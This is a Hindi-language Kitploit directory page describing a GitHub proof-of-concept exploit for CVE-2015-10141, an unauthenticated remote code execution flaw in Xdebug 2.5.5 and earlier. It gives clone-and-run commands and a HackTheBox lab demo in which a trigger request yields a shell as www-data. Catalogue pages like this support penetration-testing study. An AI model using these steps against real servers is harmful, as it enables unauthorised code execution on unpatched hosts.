Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2015-10141-Xdebug — Xdebug 2.5.5 और उससे पहले के संस्करणों के लिए Proof-of-Concept एक्सप्लॉइट स्क्रिप्ट (CVE-2015-10141)। | Kitploit
उपकरण/GitHubGitHub/n0m4d22/poc-cve-2015-10141-xdebug
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubn0m4d22/poc-cve-2015-10141-xdebug

PoC-CVE-2015-10141-Xdebug

Xdebug 2.5.5 और उससे पहले के संस्करणों के लिए Proof-of-Concept एक्सप्लॉइट स्क्रिप्ट (CVE-2015-10141)।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC-CVE-2015-10141

Xdebug ≤ 2.5.5 (CVE-2015-10141) के लिए कस्टम Python एक्सप्लॉइट।


विवरण

इस रिपॉजिटरी में 2.5.5 और उससे पुराने संस्करणों में Xdebug रिमोट कोड निष्पादन भेद्यता के लिए मेरा प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट मौजूद है।
स्क्रिप्ट पोर्ट 9000 पर उजागर अनप्रमाणित डिबगिंग प्रोटोकॉल का लाभ उठाकर रिमोट कमांड निष्पादन प्राप्त करती है।

  • भेद्यता: CVE-2015-10141
  • भेद्यता प्रकार: रिमोट कोड निष्पादन (RCE)
  • प्रभावित सॉफ़्टवेयर: Xdebug ≤ 2.5.5

उपयोग

root@kitploit:~
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py

संकेत मिलने पर, वह टारगेट IP दर्ज करें जहाँ Xdebug होस्ट किया गया है।

मेरे हालिया HackTheBox Olympus (Medium) राइट-अप से प्रदर्शन:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data

आवश्यकताएँ

  • Python 3.x
  • रिमोट डिबगिंग सक्षम के साथ Xdebug ≤ 2.5.5 चलाने वाला टारगेट

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए बनाया गया है।

स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध इस एक्सप्लॉइट का उपयोग न करें। इस कोड के किसी भी दुरुपयोग के लिए मैं ज़िम्मेदार नहीं हूँ।


संदर्भ

  • NVD – CVE-2015-10141
  • ExploitDB – 44568
  • Xdebug आधिकारिक साइट
टूल डाउनलोड करें